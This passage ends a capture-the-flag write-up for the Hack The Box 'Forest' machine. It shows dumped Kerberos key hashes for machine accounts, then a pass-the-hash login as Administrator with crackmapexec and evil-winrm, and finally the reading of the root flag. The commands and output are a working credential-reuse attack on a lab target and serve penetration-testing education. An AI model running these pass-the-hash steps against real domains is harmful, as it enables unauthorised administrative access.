FOREST$:aes256-cts-hmac-sha1-96:be5b5087b4509c2615fd28c97e1602ab971da0fb3fa22a8685e81287ddee226e
FOREST$:aes128-cts-hmac-sha1-96:b3b73050ae4f033b7b596035c52274c1
FOREST$:des-cbc-md5:02ea9b62fde54038
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up... 

Login as administrator

1
2
3
4
5
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec winrm 10.10.10.161 -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
SMB         10.10.10.161    5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\Administrator:32693b11e6aa90eb43d32c72a07ceea6 (Pwn3d!)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ evil-winrm -i htb.local -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'        
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
5b0ca47df9aaf22d49b05d4561e16c61
*Evil-WinRM* PS C:\Users\Administrator\Documents>
This post is licensed under CC BY 4.0 by the author.